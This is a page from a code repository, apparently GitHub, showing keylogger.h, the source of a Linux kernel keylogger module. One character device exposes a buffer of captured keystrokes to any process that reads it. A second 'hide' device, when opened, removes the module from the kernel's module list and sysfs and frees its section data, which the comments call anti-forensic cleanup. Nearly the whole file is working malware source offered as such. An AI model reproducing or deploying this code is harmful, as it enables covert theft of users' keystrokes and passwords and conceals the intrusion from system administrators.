-
Notifications
You must be signed in to change notification settings - Fork 0
/
keylogger.h
204 lines (178 loc) · 5.43 KB
/
keylogger.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
#ifndef KEYLOGGER
#define KEYLOGGER
#include <linux/input.h>
#include <linux/err.h>
#include <linux/keyboard.h>
#include <linux/module.h>
#include <linux/debugfs.h>
#include <linux/kallsyms.h>
#include <linux/kernfs.h>
#include <linux/uaccess.h>
#include <linux/slab.h>
#include <linux/kernel.h>
#include <linux/mutex.h>
#include <linux/fs.h>
#include <linux/err.h>
#include <linux/cdev.h>
#include <linux/semaphore.h>
#include <linux/sysfs.h>
#include "keys.h"
#define BUFF_SIZE (PAGE_SIZE << 2)
#define DEVICE_NAME "Keylogger"
/*Vars for keystroke & strings save*/
static char msg_Ptr[BUFF_SIZE];
static size_t buf_pos;
/*Vars for the charcater devices*/
struct cdev *mcdev;
struct cdev *mcdev1;
int major_number;
dev_t dev_num;
dev_t dev_num1;
struct fake_device
{
char data[100];
struct semaphore sem;
};
struct fake_device virtual_device, virtual_device1;
/*ret value and hide value*/
int ret;
int is_hide = 0;
/*define the syfs_remove_dir func*/
void (*sysfs_remove_fir_orig)(struct kobject *);
void (*sysfs_create_fir_orig)(struct kobject *);
/*file opersion for hideing and unhide the module*/
/*works by using the open file opersion*/
int dev_open_fops_for_hide(struct inode *inode, struct file* file)
{
static struct list_head *module_list;
struct kobject* saved_kobj_parent;
sysfs_remove_fir_orig = (void *)kallsyms_lookup_name("sysfs_remove_dir");
sysfs_create_fir_orig = (void *) kallsyms_lookup_name("sysfs_create_dir_ns");
if (!is_hide)
{
/*wait to get mutex*/
while (!mutex_trylock(&module_mutex))
cpu_relax();
module_list = THIS_MODULE->list.prev;
saved_kobj_parent = THIS_MODULE->mkobj.kobj.parent;
list_del_init(&THIS_MODULE->list);//remove form the modules linked list
sysfs_remove_fir_orig(&THIS_MODULE->mkobj.kobj);//remove the specific dir (not the object from the module)
kobject_put(saved_kobj_parent);
kfree(THIS_MODULE->sect_attrs);/*clean informasion for anti forensic*/
kfree(THIS_MODULE->notes_attrs);/*using kfree to clean*/
THIS_MODULE->notes_attrs = NULL;/* and then puts, NULL to seve the setings */
THIS_MODULE->sect_attrs = NULL;/*things such as .bss, .text .code etc*/
is_hide = 1;
mutex_unlock(&module_mutex);
}
else
{
while (!mutex_trylock(&module_mutex))
cpu_relax();
list_add(&THIS_MODULE->list, module_list);
kobject_get(saved_kobj_parent);
sysfs_create_fir_orig(saved_kobj_parent);
is_hide=0;
mutex_unlock(&module_mutex);
}
return 0;
}
/*fops for keyloging charcter device*/
int device_open(struct inode *inode, struct file * filp)
{
//using mutex for allow only open process to use
if (down_interruptible(&virtual_device.sem) != 0)
{
printk(KERN_ALERT "Keylogger: could not lock the device during open");
return -1;
}
printk(KERN_INFO "Keylogger: opend device");
return 0;
}
ssize_t device_write(struct file *flip, const char * buff_sorce_data, size_t buff_count, loff_t * offset)
{
printk(KERN_INFO "Keylogger: writing to device");
ret = copy_from_user(virtual_device.data, buff_sorce_data, buff_count);
return ret;
}
int device_close(struct inode *inode, struct file *flip)
{
//release the mutex
up(&virtual_device.sem);
printk(KERN_INFO "Keylogger: closed device");
return 0;
}
static ssize_t device_read(struct file *filp, char __user * buffer, size_t length, loff_t *offset)
{
return simple_read_from_buffer(buffer, length, offset, msg_Ptr, buf_pos);
}
/*################*/
//fops for the charcter devices
static struct file_operations fops =
{
.owner = THIS_MODULE,
.read = device_read,
.write = device_write,
.release = device_close,
.open = device_open
};
static struct file_operations fops_hide =
{
.owner = THIS_MODULE,
.open = dev_open_fops_for_hide
};
//#########
//load the hide charcter device
static int hide_driver_entery(void)
{
ret = alloc_chrdev_region(&dev_num1, 0, 1, "hide");
if (ret < 0)
{
printk(KERN_ALERT "Keylogger: failed to allocate a major number for hide");
return ret;
}
major_number = MAJOR(dev_num1);
mcdev1 = cdev_alloc();
mcdev1->ops = &fops_hide;
mcdev1->owner = THIS_MODULE;
ret = cdev_add(mcdev1, dev_num1, 1);
if (ret < 0)
{
printk(KERN_ALERT "kelogger: unable to add hide cdev to kernel");
return -1;
}
sema_init(&virtual_device1.sem, 1);
return 0;
}
//load the charcter device for keyloging
static int driver_entry(void)
{
ret = alloc_chrdev_region(&dev_num, 0, 1, DEVICE_NAME);
if (ret < 0)
{
printk(KERN_ALERT "Keylogger: failed to allocate a major number for fops");
return ret;
}
major_number = MAJOR(dev_num);
printk(KERN_INFO "Keylogger: major number is %d", major_number);
printk(KERN_INFO "\t use\\mknod /dev/%s c %d for device fike", DEVICE_NAME, major_number);
mcdev = cdev_alloc();
mcdev->ops = &fops;
mcdev->owner = THIS_MODULE;
ret = cdev_add(mcdev, dev_num, 1);
if (ret < 0)
{
printk(KERN_ALERT "Keylogger: unable to add cdev to kernel");
return -1;
}
sema_init(&virtual_device.sem, 1);
return 0;
}
//unload the charcter device for keyloging
static void driver_exit(void)
{
cdev_del(mcdev);
unregister_chrdev_region(dev_num, 1);
printk(KERN_ALERT "Keylogger: unloaded module");
}
#endif